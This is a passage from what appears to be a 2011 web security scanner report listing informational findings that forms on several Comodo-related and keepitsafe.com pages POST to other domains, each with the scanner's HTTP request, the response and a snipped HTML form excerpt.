<form onsubmit="return wrapvalidate(validate());" name="evssl" id="evssl" method="post" action="https://secure.comodo.com/products/!PlaceOrder" onSubmit="javascript:__utmLinkPost('/G/securepurchase/HG-addsupport_sslpurchase/proceedtocheckout_btn')">
<script type="text/javascript" >
...[SNIP]...

9.4. https://hackerguardian.com/pci-compliance/addsupport/ssl-purchase.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://hackerguardian.com
Path:   /pci-compliance/addsupport/ssl-purchase.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

Request

GET /pci-compliance/addsupport/ssl-purchase.html HTTP/1.1
Host: hackerguardian.com
Connection: keep-alive
Referer: https://hackerguardian.com/hackerguardian/buy/pci_free_scan.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: countryName=; loginName=324234234; optimizelyEndUserId=oeu1316362675388r0.6238376419059932; shopcart_s=hgFreePCISS&Free PCI Scan&0&3460; prodid=&3460; __utma=1.620635661.1316362711.1316362711.1316362711.1; __utmc=1; __utmz=1.1316362711.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utmx=212060173.; __utmxx=212060173.; optimizelyBuckets=%7B%7D; __utma=212060173.773737511.1316362678.1316362678.1316362678.1; __utmb=212060173.5.10.1316362681; __utmc=212060173; __utmz=212060173.1316362678.1.1.utmcsr=comodo.com|utmccn=(referral)|utmcmd=referral|utmcct=/e-commerce/; ap=; referrerURL=https%3A//www.hackerguardian.com/sas/login.jsp%3Flogin_error%3D1; entryURL=https%3A//hackerguardian.com/hackerguardian/learn/free_vuln_scan.html; currency=USD; region=North%20America; country=US

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:55:37 GMT
Server: Apache
Accept-Ranges: bytes
Keep-Alive: timeout=1, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 76758

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script src="//cdn.opti
...[SNIP]...
</script>


<form onsubmit="return wrapvalidate(validate());" name="evssl" id="evssl" method="post" action="https://secure.comodo.com/products/!PlaceOrder" onSubmit="javascript:__utmLinkPost('/G/securepurchase/HG-addsupport_sslpurchase/proceedtocheckout_btn')">
<script type="text/javascript" >
...[SNIP]...

9.5. http://www.comodoantispam.com/signup.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.comodoantispam.com
Path:   /signup.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

Request

GET /signup.html HTTP/1.1
Host: www.comodoantispam.com
Proxy-Connection: keep-alive
Referer: http://www.vengine.com/products/prove_it.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:40:09 GMT
Content-Type: text/html
Last-Modified: Fri, 05 Nov 2010 21:21:39 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Content-Length: 11809

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Comodo Antispam S
...[SNIP]...
<td>
<form name="form1" method="post" action="https://secure.comodo.com/products/!PlaceOrder" onSubmit="return checkForm(this);" >
<table width="100%" border="0" cellspacing="3" cellpadding="3">
...[SNIP]...

9.6. http://www.comodopartners.com/partner/evssl.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.comodopartners.com
Path:   /partner/evssl.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

Request

GET /partner/evssl.html HTTP/1.1
Host: www.comodopartners.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:12:18 GMT
Content-Type: text/html
Content-Length: 8506
Last-Modified: Tue, 12 Oct 2010 00:39:57 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<titl
...[SNIP]...
<div id="login_box" style="z-index:99 ">
               <form name="loginForm" method="post" action="https://secure.comodo.com/products/!hostedLogin" onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">
               <input value="US" name="country" type="hidden" >
...[SNIP]...

9.7. http://www.comodopartners.com/partner/partnerdoc.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.comodopartners.com
Path:   /partner/partnerdoc.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

Request

GET /partner/partnerdoc.html HTTP/1.1
Host: www.comodopartners.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:12:16 GMT
Content-Type: text/html
Content-Length: 17656
Last-Modified: Tue, 01 Feb 2011 23:59:28 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<titl
...[SNIP]...
<div id="login_box" style="z-index:99 ">
               <form name="loginForm" method="post" action="https://secure.comodo.com/products/!hostedLogin" onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">
               <input value="US" name="country" type="hidden" >
...[SNIP]...

9.8. http://www.comodopartners.com/partner/rootkey.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.comodopartners.com
Path:   /partner/rootkey.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

Request

GET /partner/rootkey.html HTTP/1.1
Host: www.comodopartners.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:12:17 GMT
Content-Type: text/html
Content-Length: 9626
Last-Modified: Tue, 12 Oct 2010 00:39:57 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<titl
...[SNIP]...
<div id="login_box" style="z-index:99 ;">
               <form name="loginForm" method="post" action="https://secure.comodo.com/products/!hostedLogin" onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">
               <input value="US" name="country" type="hidden" >
...[SNIP]...

9.9. http://www.comodopartners.com/partner/trustlogo.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.comodopartners.com
Path:   /partner/trustlogo.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

Request

GET /partner/trustlogo.html HTTP/1.1
Host: www.comodopartners.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:12:17 GMT
Content-Type: text/html
Content-Length: 8498
Last-Modified: Tue, 12 Oct 2010 00:39:57 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<titl
...[SNIP]...
<div id="login_box" style="z-index:99 ;">
               <form name="loginForm" method="post" action="https://secure.comodo.com/products/!hostedLogin" onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">
               <input value="US" name="country" type="hidden" >
...[SNIP]...

9.10. http://www.contentverification.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.contentverification.com
Path:   /

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

Request

GET / HTTP/1.1
Host: www.contentverification.com
Proxy-Connection: keep-alive
Referer: http://www.vengine.com/products/prove_it.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:40:48 GMT
Content-Type: text/html
Last-Modified: Tue, 12 Oct 2010 00:45:21 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Content-Length: 10312

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<title>Brand
...[SNIP]...
<div id="loginb" style="top: 5px;right:5px;">
<form name="loginForm" method="post" action="https://secure.comodo.com/products/!hostedLogin" onSubmit="return
submitLoginForm(this.loginName, this.loginPassword)">


Account Login <input name="loginName" id="loginName" size="10" type="text" />
...[SNIP]...

9.11. http://www.contentverification.com/certs/BoilingSpringsLoginBox.cer

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.contentverification.com
Path:   /certs/BoilingSpringsLoginBox.cer

Issue detail

The page contains a form which POSTs data to the domain secure-bssbank.com. The form contains the following fields:

Request

GET /certs/BoilingSpringsLoginBox.cer HTTP/1.1
Host: www.contentverification.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:12:02 GMT
Content-Type: application/octet-stream
Content-Length: 4387
Last-Modified: Fri, 15 Dec 2006 13:41:46 GMT
Connection: close
Accept-Ranges: bytes

0...0................Klt...O...0.    *.H.......0..1.0    ..U....GB1.0...U....Greater Manchester1.0...U....Salford1.0...U.
..Comodo CA Limited1-0+..U...$Comodo Content Verification Services0..051220000000
...[SNIP]...
<td width="163" colspan="2" style="border: 1px solid #ffffff; border-bottom: 0px;">
<form action="https://secure-bssbank.com/Common/SignOn/SignOn.asp" method="post" id="form1" name="form1" autocomplete="off">
               <table border="0">
...[SNIP]...

9.12. http://www.contentverification.com/logos/login.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.contentverification.com
Path:   /logos/login.html

Issue detail

The page contains a form which POSTs data to the domain www.cr3ativedevelopment.com. The form contains the following fields:

Request

GET /logos/login.html HTTP/1.1
Host: www.contentverification.com
Proxy-Connection: keep-alive
Referer: http://www.contentverification.com/logos/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=14506661.917737140.1316364115.1316364115.1316364115.1; __utmc=14506661; __utmz=14506661.1316364115.1.1.utmccn=(referral)|utmcsr=vengine.com|utmcct=/products/prove_it.html|utmcmd=referral; __utmb=14506661

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:59:15 GMT
Content-Type: text/html
Last-Modified: Tue, 12 Oct 2010 00:45:20 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Content-Length: 9765

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Spoof
...[SNIP]...
</p>
<form name="form1" method="post" action="http://www.cr3ativedevelopment.com/cvc/fprocess.php"> <table>
...[SNIP]...

9.13. http://www.contentverification.com/logos/login.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.contentverification.com
Path:   /logos/login.html

Issue detail

The page contains a form which POSTs data to the domain secure-bssbank.com. The form contains the following fields:

Request

GET /logos/login.html HTTP/1.1
Host: www.contentverification.com
Proxy-Connection: keep-alive
Referer: http://www.contentverification.com/logos/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=14506661.917737140.1316364115.1316364115.1316364115.1; __utmc=14506661; __utmz=14506661.1316364115.1.1.utmccn=(referral)|utmcsr=vengine.com|utmcct=/products/prove_it.html|utmcmd=referral; __utmb=14506661

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:59:15 GMT
Content-Type: text/html
Last-Modified: Tue, 12 Oct 2010 00:45:20 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Content-Length: 9765

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Spoof
...[SNIP]...
<td width="163" colspan="2" style="border: 1px solid #ffffff; border-bottom: 0px;">
<form action="https://secure-bssbank.com/Common/SignOn/SignOn.asp" method="post" id="form1" name="form2" autocomplete="off">
               <table border="0">
...[SNIP]...

9.14. http://www.contentverification.com/logos/logo.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.contentverification.com
Path:   /logos/logo.html

Issue detail

The page contains a form which POSTs data to the domain www.cr3ativedevelopment.com. The form contains the following fields:

Request

GET /logos/logo.html HTTP/1.1
Host: www.contentverification.com
Proxy-Connection: keep-alive
Referer: http://www.contentverification.com/products/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=14506661.917737140.1316364115.1316364115.1316364115.1; __utmc=14506661; __utmz=14506661.1316364115.1.1.utmccn=(referral)|utmcsr=vengine.com|utmcct=/products/prove_it.html|utmcmd=referral; currency=USD; region=North%20America; country=US; __utmb=14506661

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:02:04 GMT
Content-Type: text/html
Last-Modified: Tue, 12 Oct 2010 00:45:20 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Content-Length: 5985

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Ide
...[SNIP]...
</p>
<form name="form1" method="post" action="http://www.cr3ativedevelopment.com/cvc/fprocess.php"> <table>
...[SNIP]...

9.15. http://www.contentverification.com/logos/thirdparty.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.contentverification.com
Path:   /logos/thirdparty.html

Issue detail

The page contains a form which POSTs data to the domain www.cr3ativedevelopment.com. The form contains the following fields:

Request

GET /logos/thirdparty.html HTTP/1.1
Host: www.contentverification.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:11:55 GMT
Content-Type: text/html
Content-Length: 6030
Last-Modified: Tue, 12 Oct 2010 00:45:20 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Ide
...[SNIP]...
</p>
<form name="form1" method="post" action="http://www.cr3ativedevelopment.com/cvc/fprocess.php"> <table>
...[SNIP]...

9.16. http://www.enterprisessl.com/ssl-certificate-products/addsupport/ssl-purchase.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.enterprisessl.com
Path:   /ssl-certificate-products/addsupport/ssl-purchase.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.net. The form contains the following fields:

Request

GET /ssl-certificate-products/addsupport/ssl-purchase.html?items=price_retail_comodoevssl_2yr&x=12&y=3 HTTP/1.1
Host: www.enterprisessl.com
Proxy-Connection: keep-alive
Referer: http://www.enterprisessl.com/ssl-certificate-products/addsupport/ssl-evssl.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ap=; referrerURL=http%3A//www.vengine.com/products/prove_it.html; entryURL=http%3A//www.enterprisessl.com/; __utma=1.33002135.1316365450.1316365450.1316365450.1; __utmb=1.1.10.1316365450; __utmc=1; __utmz=1.1316365450.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); currency=USD; region=North%20America; country=US

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:03:09 GMT
Content-Type: text/html
Last-Modified: Fri, 02 Sep 2011 05:12:03 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Content-Length: 89573

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Digital SSL Certi
...[SNIP]...
<div class="productcontainer" >
           
       <form onSubmit="return validate( );" name="evssl" id="evssl" method="post" action="https://secure.comodo.net/products/!PlaceOrder">
               <input name="contractSignerName" type="hidden" id="contractSignerName" value="" />
...[SNIP]...

9.17. https://www.enterprisessl.com/login.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.enterprisessl.com
Path:   /login.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

Request

GET /login.html HTTP/1.1
Host: www.enterprisessl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:11:25 GMT
Content-Type: text/html
Content-Length: 6518
Last-Modified: Mon, 17 Jan 2011 23:35:17 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>EnterpriseSSL.com
...[SNIP]...
<div id="secuerlogin" style="width:780px; height:145px; background-color:#F1F1F1; margin-top:20px; ">
   <form name="loginForm" method="post" action="https://secure.comodo.com/products/!hostedLogin" onsubmit="return    submitLoginForm(this.loginName, this.loginPassword)">
       <table border="0" cellspacing="0" cellpadding="0" align="center" style="margin:auto;">
...[SNIP]...

9.18. http://www.keepitsafe.com/corporate_enterprise.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.keepitsafe.com
Path:   /corporate_enterprise.php

Issue detail

The page contains a form which POSTs data to the domain secure.logmeinrescue.com. The form contains the following fields:

Request

GET /corporate_enterprise.php?utm_source=j2com&utm_medium=xsell-referral&utm_campaign=enterprise&utm_content=keepitsafe HTTP/1.1
Host: www.keepitsafe.com
Proxy-Connection: keep-alive
Referer: http://home.j2.com/enterprise/enterprise.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:19:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding
Content-Length: 13659
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<div class="connect">
<form action="https://secure.logmeinrescue.com/Customer/Code.aspx" method="post" name="connectForm" id="connectForm" target="_blank" style="display:none">6 DIGIT SUPPORT CODE: <input name="Code" type="text" id="Code" value="" size="10" maxlength="6" />
...[SNIP]...

9.19. http://www.keepitsafe.com/solutions.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.keepitsafe.com
Path:   /solutions.php

Issue detail

The page contains a form which POSTs data to the domain secure.logmeinrescue.com. The form contains the following fields:

Request

GET /solutions.php HTTP/1.1
Host: www.keepitsafe.com
Proxy-Connection: keep-alive
Referer: http://www.keepitsafe.com/corporate_enterprise.php?utm_source=j2com&utm_medium=xsell-referral&utm_campaign=enterprise&utm_content=keepitsafe
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=119704978.709955153.1316366446.1316366446.1316366446.1; __utmb=119704978.1.10.1316366446; __utmc=119704978; __utmz=119704978.1316366446.1.1.utmcsr=j2com|utmccn=enterprise|utmcmd=xsell-referral|utmcct=keepitsafe

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:20:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 12365

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<div class="connect">
<form action="https://secure.logmeinrescue.com/Customer/Code.aspx" method="post" name="connectForm" id="connectForm" target="_blank" style="display:none">6 DIGIT SUPPORT CODE: <input name="Code" type="text" id="Code" value="" size="10" maxlength="6" />
...[SNIP]...

9.20. http://www.trustix.com/login.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.trustix.com
Path:   /login.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.net. The form contains the following fields:

Request

GET /login.html HTTP/1.1
Host: www.trustix.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:26 GMT
Content-Type: text/html
Content-Length: 3852
Last-Modified: Fri, 15 Dec 2006 15:12:29 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<title>Trust
...[SNIP]...
</p>

<form name="loginForm" method="post" action="https://secure.comodo.net/products/!hostedLogin" onsubmit="return    submitLoginForm(this.loginName, this.loginPassword)">
<table cellspacing="0" cellpadding="0" >
...[SNIP]...

9.21. http://www.trustix.com/support/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.trustix.com
Path:   /support/index.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.net. The form contains the following fields:

Request

GET /support/index.html HTTP/1.1
Host: www.trustix.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:26 GMT
Content-Type: text/html
Content-Length: 11955
Last-Modified: Fri, 15 Dec 2006 15:12:29 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<title>Trustix&
...[SNIP]...
</table>

<form name="form1" method="post" action="https://secure.comodo.net/products/!placeOrder" onsubmit="return checkForm(this);">
<input type="hidden" name="ap" value="trustix" />
...[SNIP]...

9.22. http://www.vengine.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

Request

GET / HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:38:35 GMT
Content-Type: text/html
Content-Length: 11760
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<title>Anti Phishing Site
...[SNIP]...
<div id="login" style="top: 46px;">

<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
...[SNIP]...

9.23. http://www.vengine.com/corporate/about.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /corporate/about.html

Issue detail

The page contains a form which POSTs data to the domain secure.comodo.com. The form contains the following fields:

Request

GET /corporate/about.html HTTP/1.1
Host: www.vengine.com
Proxy-Connection: keep-alive
Referer: http://www.vengine.com/support/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=252787086.1679413329.1316363998.1316363998.1316363998.1; __utmb=252787086.4.10.1316363998; __utmc=252787086; __utmz=252787086.1316363998.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:39:29 GMT
Content-Type: text/html
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Content-Length: 10580

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Vengine.com - Ant
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
...[SNIP]...

9.24. http://www.vengine.com/corporate/contact.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /corporate/contact.html

